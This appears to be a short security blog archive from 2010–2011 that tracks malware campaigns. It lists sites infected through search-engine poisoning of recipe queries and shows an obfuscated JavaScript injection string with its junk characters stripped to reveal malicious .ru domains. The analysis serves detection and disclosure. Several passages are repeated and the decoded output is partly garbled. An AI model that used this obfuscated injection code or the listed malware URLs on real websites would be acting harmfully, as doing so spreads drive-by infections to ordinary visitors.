Saturday, April 2, 2011
Tuesday, March 1, 2011
Monday, June 14, 2010
hello_nod32_guys_how_u_doing
#nod32_is_the_best_av a {
color:#225588;
}
#hello_nod32_guys_how_u_doing .nfav {
-x-system-font:none;
color:#225588;
}
#hello_nod32_guys_how_u_doing .nfav {
-x-system-font:none;
Monday, May 24, 2010
Search Engine Poisoning
searching for " fajita recipe" returns 2 malware campaigns.
from poisoned legit subdomains.
just some of the infected sites.
cooldenver.com/eytfo5/cdc.php?slow-cooker-cod-fish
vosar.biz/rifxa8/jj.php?bbq-pork-loin-slow-cooker-recipes
pscully.com/lab.php?ale=105
filipegouveia.com.br/t.php?mit=8
rbchelena.org/odi.php?psi=181
strengthenmefitness.com/qc.php?yet=87
thetechexec.com/beg.php?lm=242
neoapex.ro/bai.php?alb=255
nuveda.com/era.php?ps=185
http://magar.org/iycz4/yes.php?mexican-dishes-recipes
http://gathering.edfruinphotography.com/tnuii4/gtayk.php?caseroles-for-two-recipes
mchealthsolutions.com/vel.php?pya=168
esynectics.com/vin.php?ace=37
may only activate if the referrer is set to google.com
from poisoned legit subdomains.
just some of the infected sites.
cooldenver.com/eytfo5/cdc.php?slow-cooker-cod-fish
vosar.biz/rifxa8/jj.php?bbq-pork-loin-slow-cooker-recipes
pscully.com/lab.php?ale=105
filipegouveia.com.br/t.php?mit=8
rbchelena.org/odi.php?psi=181
strengthenmefitness.com/qc.php?yet=87
thetechexec.com/beg.php?lm=242
neoapex.ro/bai.php?alb=255
nuveda.com/era.php?ps=185
http://magar.org/iycz4/yes.php?mexican-dishes-recipes
http://gathering.edfruinphotography.com/tnuii4/gtayk.php?caseroles-for-two-recipes
mchealthsolutions.com/vel.php?pya=168
esynectics.com/vin.php?ace=37
may only activate if the referrer is set to google.com
Thursday, January 28, 2010
stuffed malware domains
delete all the !@#$%^&*+|')( stuffing from the injection strings to find the domain
'a^(c#@$&e))b&&o!^&o^)$#k(!&-#c@o&)m$##.$!@t))o^((p!&@!l(i!((n($e#$m^#)a((@r$@!(i#n^@@$e(#((.#&r@$@)u^$):^(D@^E(&&B^U)G&&$/#)(i((@p!@$i&#c$@(t(!u!&r$e&)((.!$^$$r@u&/@(i@#p$)i(!c!^$!^t(^$$u#!(r()@e##.)#r(^@$u)(^$@/(@g$!$^)o&$#o)!(g$!l)&&e$$.&$c@@#)o@#$m^^@/)@&c&(^)n(!z$z!&@.$$c)!@o!^m!#/)#s)($k$&y^&c#&$n).#c!@(o@@$m@#$$^/@'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, '') ;document.write('
becomes;
'acebook-com.toplinemarine.ru:DEBUG/ipicture.ru/ipicture.ru/google.com/cnzz.com/skycn.com/.replace//ig;document.write'catchDj8lyxd
'a^(c#@$&e))b&&o!^&o^)$#k(!&-#c@o&)m$##.$!@t))o^((p!&@!l(i!((n($e#$m^#)a((@r$@!(i#n^@@$e(#((.#&r@$@)u^$):^(D@^E(&&B^U)G&&$/#)(i((@p!@$i&#c$@(t(!u!&r$e&)((.!$^$$r@u&/@(i@#p$)i(!c!^$!^t(^$$u#!(r()@e##.)#r(^@$u)(^$@/(@g$!$^)o&$#o)!(g$!l)&&e$$.&$c@@#)o@#$m^^@/)@&c&(^)n(!z$z!&@.$$c)!@o!^m!#/)#s)($k$&y^&c#&$n).#c!@(o@@$m@#$$^/@'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, '') ;document.write('
becomes;
'acebook-com.toplinemarine.ru:DEBUG/ipicture.ru/ipicture.ru/google.com/cnzz.com/skycn.com/.replace//ig;document.write'catchDj8lyxd
Wednesday, January 27, 2010
Subscribe to:
Posts (Atom)
Posts
